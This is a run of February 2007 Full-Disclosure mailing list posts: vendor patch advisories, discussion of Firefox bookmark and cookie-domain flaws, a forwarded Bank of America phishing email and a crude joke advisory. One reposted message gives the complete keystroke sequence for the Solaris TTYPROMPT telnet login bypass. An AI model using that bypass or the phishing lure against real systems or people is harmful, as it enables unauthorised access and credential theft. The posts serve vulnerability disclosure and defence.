2007.0/x86_64/kernel-xenU-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm b971ee2fe8d6ddc83765cb2705671e35 2007.0/SRPMS/kernel-2.6.17.11mdv-1-1mdv2007.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF3HwWmqjQ0CJFipgRAkCfAKCX0gHpVuviY1XvstagrhWoA3SO+QCfQEia bEwFnnh0MdO2y2+vSLUpPXs= =F1EK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?
Dear Marc, This is hilarious, should there ever be a Top10 of the most weird bugs, this surely is one of them, repost for pure amusement : Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 cs, and a literal \n. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed). Example: coma% telnet telnet environ define TTYPROMPT abcdef telnet o localhost SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: whenever $ whoami bin -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
On 2/22/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc). The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing. The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible. Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this. Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/ This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179 In April, just after MoPHPB, Michal Zalewski is going to plan a Month of Firefox Bugs. (^-^) -- GUASCONI Vincent Student. http://altmylife.blogspot.com [Fr] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of America [phising email]
Dear phishers, If ever you need someone to help you with your spelling and grammar to make your phishing emails just a bit convincing, drop me a mail and I will proof-read your scam texts. I have a degree in English and I was regularly top of my class for spelling. Whilst I do not doubt your technical bot-writing capability, the standard of your text is generally poor and a dead giveaway. I will help! Ta, JR On 21/02/07, Troy Cregger [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Got an email today that was crafted to look like it came from Bank of America, the message contained the following: Because of unusual number of invalid login attempts on you account, we had to believe that, their might be some security problem on you account. So we have decided to put an extra verification process to ensure your identity and your account security. Please click on A href= http://www.candy-pop.com/www.bankofamerica.com/BOA/sslencrypt218bit/online_banking/index.htm target=_blanksign in to Online Banking/A to continue to the verification process and ensure your account security. It is all about your security. Thank you, and visit the customer service section. Which of course loads a phishing page that would capture login credentials should anyone fall for the ruse. This may be old news though and possibly related to another story I read earlier on Zone-H here: http://www.zone-h.org/content/view/14577/31/ Troy Cregger Lead Developer, Technical Products. Kennedy Information, Inc One Phoenix Mill Ln, Fl 3 Peterborough, NH 03458 (603)924-0900 ext 662 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF3HPLnBEWLrrYRl8RAmPbAJsEhggVS+bHdwHYAi6Zrax+azPPXwCfd2T8 gKSsfPlF/9a+kPWEYacykVg= =aepj -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc). The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing. The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible. Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this. Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/ This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179 /mz http://lcamtuf.coredump.cx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
michal, is that a feature or a bug? maybe it is not obivous to me what you are doing but it i feel that it is almost like asking the user to bookmark a bookmarklet. of course it is a security problem if you execute untrusted bookmarklet on a page :). On 2/21/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc). The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing. The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible. Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this. Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/ This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179 /mz http://lcamtuf.coredump.cx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
On Thu, 22 Feb 2007, pdp (architect) wrote: michal, is that a feature or a bug? maybe it is not obivous to me what you are doing but it i feel that it is almost like asking the user to bookmark a bookmarklet. Bookmarklets should be bookmarkable only manually, with user knowledge and consent (that is, you need to copy-and-paste the URL, etc). This seems to be the case for javascript: URLs. Here, the situation is different: the user can, and quite likely will, unknowingly bookmark a script while attempting to bookmark a regular page via Ctrl-D + return. He doesn't expect or want this code to later run in the context of his start page or any other resource (principle of least astonishment, etc, etc). Cheers, /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
There seems to be some confusion regarding the exact impact of the location.hostname vulnerability, and the ways to protect against it. I wanted to offer a quick clarification. 1) Cookie setting (session fixation) attacks can be executed universally and with no restrictions. This is demonstrated by the originally provided PoC, and is a serious security threat. A common implication of such a flaw is that the user can be forced to authenticate within attacker's session, implanted as a persistent cookie. WARNING: The attack does not require the browser to interact with the attacked site in any way. The cookie is set somewhere else and ahead of the visit. In other words, the fact your site runs IIS does not make you any more secure. The fact your servers are behind Squid in a reverse proxy mode has no significance. Vulnerable *clients* can be protected by a proxy that rejects requests containing a NUL character; Squid is a good example. A safer option is to implement the prefs.js workaround recommended on the test page and in Bugzilla, however... and an updated version of Firefox should be available tomorrow, anyway. 2) Frame / window manipulation and cookie stealing attacks can be executed against sites that explicitly set 'document.domain' to an arbitrary value, even if this occurs only on a single sub-page. Some high-profile sites do that, others don't. Still, the attack is very much possible; I prepared a new testcase for non-believers: http://lcamtuf.dione.cc/ffhostname_cnn.html 3) In my initial advisory, I mistakenly stated that XMLHttpRequest() can be one of attack vectors. It can't - contrary to some sources, in Firefox, this mechanism ignores document.domain altogether. You have to rely on the two methods described above - but that's quite a lot, anyway. Cheers, /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-425-1] slocate vulnerability
=== Ubuntu Security Notice USN-425-1 February 22, 2007 slocate vulnerability CVE-2007-0227 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: slocate 3.0.beta.r3-1ubuntu0.1 Ubuntu 6.10: slocate 3.1-1ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A flaw was discovered in the permission checking code of slocate. When reporting matching files, locate would not correctly respect the parent directory's read bits. This could result in filenames being displayed when the file owner had expected them to remain hidden from other system users. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1.diff.gz Size/MD5: 8063 7eecd20fe954bbecc7024601c0ce1260 http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1.dsc Size/MD5: 684 d21f5d570fa7c79b1d335d35d7e6a5c7 http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3.orig.tar.gz Size/MD5:29590 25e8bf6732a801f0470301fa84ef959e amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1_amd64.deb Size/MD5:32262 9be75b99ab8009aa9692d1b793c41f68 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1_i386.deb Size/MD5:30352 75625a80073abc76faf0afa539b30c25 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1_powerpc.deb Size/MD5:31614 2d176a9806e41b00430cdcad7b9c244b sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1_sparc.deb Size/MD5:30574 de584d717f3c389c1a5759a7f003bb3b Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1.diff.gz Size/MD5: 8201 e2cac07776d27e0917fb2aa78b8f6d3f http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1.dsc Size/MD5: 660 8b06c09cc529037c75aff55035e8a90c http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1.orig.tar.gz Size/MD5:30051 69b45865ebce0cbfeb430381f0eb8b51 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1_amd64.deb Size/MD5:32384 d3ea172c7266defbebcdfb59d514b1de i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1_i386.deb Size/MD5:31136 d1dde1cef1183781bda25b962ab466ec powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1_powerpc.deb Size/MD5:31922 12a84a8029dbeb33bb65ff1a71785767 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1_sparc.deb Size/MD5:31062 827164a9dee3431fe353bb04c061de97 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of America [phising email]
Yes yes! They will make sure of course however the dumb person that falls for it thinks hey look Bank Of America can't spell heheheh On 2/21/07, James Rankin [EMAIL PROTECTED] wrote: Dear phishers, If ever you need someone to help you with your spelling and grammar to make your phishing emails just a bit convincing, drop me a mail and I will proof-read your scam texts. I have a degree in English and I was regularly top of my class for spelling. Whilst I do not doubt your technical bot-writing capability, the standard of your text is generally poor and a dead giveaway. I will help! Ta, JR On 21/02/07, Troy Cregger [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Got an email today that was crafted to look like it came from Bank of America, the message contained the following: Because of unusual number of invalid login attempts on you account, we had to believe that, their might be some security problem on you account. So we have decided to put an extra verification process to ensure your identity and your account security. Please click on A href= http://www.candy-pop.com/www.bankofamerica.com/BOA/sslencrypt218bit/online_banking/index.htm target=_blanksign in to Online Banking/A to continue to the verification process and ensure your account security. It is all about your security. Thank you, and visit the customer service section. Which of course loads a phishing page that would capture login credentials should anyone fall for the ruse. This may be old news though and possibly related to another story I read earlier on Zone-H here: http://www.zone-h.org/content/view/14577/31/ Troy Cregger Lead Developer, Technical Products. Kennedy Information, Inc One Phoenix Mill Ln, Fl 3 Peterborough, NH 03458 (603)924-0900 ext 662 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF3HPLnBEWLrrYRl8RAmPbAJsEhggVS+bHdwHYAi6Zrax+azPPXwCfd2T8 gKSsfPlF/9a+kPWEYacykVg= =aepj -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full Disclosure Advisory on Full-Disclosure hax0r3rz
to forgive me but if you will be going to call peoples in the list morons because they affix the posts constantemente to feed egos can you at least mentioning gadi enron and valdis kletnieks for the names ? perhaps perhaps also you do not realize that this list does not have nothing absolutamente to do with security of the computer. you are perhaps wearing a jacket sports? please make the verification and if so removes it ! On 2/21/07, Mofo Haxsor [EMAIL PROTECTED] wrote: Weakness in Full Disclosure mailing list allows morons to flourish Vulnerable: The entire mailing list Severity: Critic-Ill Classification: Loser Validation BugTraq-ID: TBA CVE-Number: TBA Remote Exploit: YUP Local Exploit: YUP Vendor URL: http://lists.grok.org.uk Author: Mai Long Wang Scheduled Release date: Feb 21st, 2007 Notifications: Right now retard Problem: By keeping an unmoderated mailing list, Full Disclosure has introduced the security community to insane amount of idiots who think that downloading any and all PHP based software then running: for i in `find . -name *.php` do grep phpinfo $i echo eye can hax0r1ze y0ur bl0g done This issue has become increasingly disturbing as idiots from all over the world have not been able to differentiate themselves between mules (aka asses) from real hackers. Full disclosure has also introduced other types of clowns who spam up legitimate users' email boxes with moronic responses fired off in desperation in attempts to boost the clown's ego. Vendor Response: None. Vendor is also clueless Solution: Introduce a security mailing list for professionals that is moderated, its users have been validated, and the typical response will not be: Sh4r j00 fackinG luzer. I pwned your php webserver with my lam3 ass 0day Did j0o s33 how I hax0rfied their server Mustafa! Praises be due to allah! Joo facking Jews. I said so therefore it is! mYe SiGnAtUrE iS r33t wAiT tILL eYe sh0w mYe Netzero and AOL gaytarded buddies I can hax0r! Workaround: Filter luzers' email addresses Credit: Old schoolers who know damn well where this advisory is coming from. Greets: Greets go out to the dinosaurs no longer on the scene. Those on the scene... You know where to find me. Copyright: Copytheft (c) 2007 x to the p zero This report should be copied and redistributed to the idiots on this list whenever possible in attempts to get them to finally shut their damn mouths in efforts to minimize the nonsense filling my email ebox. Additional thoughts on minimizing the amount of idiocy would be taking a stick and using some of these idiots as a party Pinata. This report is intended to make users think before they shoot off dumb ass messages no one gives a flying fuck about. Moderators are asked to do something productive which is called moderate. Idiots are also asked to be productive and swallow a gallon of Liquid Drano before bedtime. Parents are also asked to monitor their little rejects and give the some attention so they can stop playing hax0rs and giving security professionals a bad rap when the word hacker comes into a business conversation. It's been too long that the mention of the word hacker sets of unwarranted paranoia. -- http://a8-asy.a8ww.net/a8-ads/adftrclick?redirectid=en-mail_a_01 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
On 2/22/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc). The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing. The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible. Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this. Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/ This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179 In April, just after MoPHPB, Michal Zalewski is going to plan a Month of Firefox Bugs. Oh no!! n3tty does not like that!! :( ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Overtaking Google Desktop
On Thu, 22 Feb 2007, Steve Ragan wrote: Yea he uses it later in the video, you see him pull it up in the attack, and read it. One would assume it is fake. [lights dim, sinister accords play] ...OR IS IT? /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-426-1] Ekiga vulnerabilities
=== Ubuntu Security Notice USN-426-1 February 22, 2007 ekiga, gnomemeeting vulnerabilities CVE-2007-1006, CVE-2007-1007 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: gnomemeeting 1.2.2-1ubuntu1.1 Ubuntu 6.06 LTS: ekiga2.0.1-0ubuntu6.1 Ubuntu 6.10: ekiga2.0.3-0ubuntu3.1 After a standard system upgrade you need to restart Ekiga to effect the necessary changes. Details follow: Mu Security discovered a format string vulnerability in Ekiga. If a user was running Ekiga and listening for incoming calls, a remote attacker could send a crafted call request, and execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1.diff.gz Size/MD5:12465 55f41497417828ebef140cc0670a25d6 http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1.dsc Size/MD5: 1811 63cc3478d280f09018f24ae55c3aa4ed http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2.orig.tar.gz Size/MD5: 6059950 65fe2d6a31e63a37c5a6217206223192 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1_amd64.deb Size/MD5: 1826384 b3bfbd016a2e5fdd4f54ad639bef4e9b i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1_i386.deb Size/MD5: 1802170 3245abb98b202c2f6e7c27760723af5c powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1_powerpc.deb Size/MD5: 1817502 64236066ccb7f81fddb6728b158f0415 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1_sparc.deb Size/MD5: 1803872 4ec0f28c58259ec9bf5aac2917a542f6 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1.diff.gz Size/MD5:23489 9c1a9e42584e604667c474b441390dce http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1.dsc Size/MD5: 2090 3eabad082fd143a10c5b3625db75562b http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1.orig.tar.gz Size/MD5: 5572709 9f0a2bcce380677e38b23991320df171 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1_amd64.deb Size/MD5: 3687800 943691c7d2d27e7d3156b050772ddd04 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1_i386.deb Size/MD5: 3658022 fd451db8ed71af0d0caae71b0e55e7ec powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1_powerpc.deb Size/MD5: 3673764 423bf587f00be062ffaf7b9cd62487c4 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1_sparc.deb Size/MD5: 3660784 b2ecd3a204168f67638000cd01c46a39 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1.diff.gz Size/MD5:23822 fc9d0688739586606dc67efa1662070f http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1.dsc Size/MD5: 1837 1da46e1bc9e1b820ee77cc32fc6c80d7 http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3.orig.tar.gz Size/MD5: 5749938 5ad3458d73d65c6502c312ff0c430a7c amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1_amd64.deb Size/MD5: 3688744 d4d26c59a8a1e90a82ad72961f3ffae8 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1_i386.deb Size/MD5: 3668392 a12654dfa595f8cf37f89bf9b644dd44 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1_powerpc.deb Size/MD5: 3676188 e2df269899f919673f2a7b7da7f0c8d1 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1_sparc.deb Size/MD5: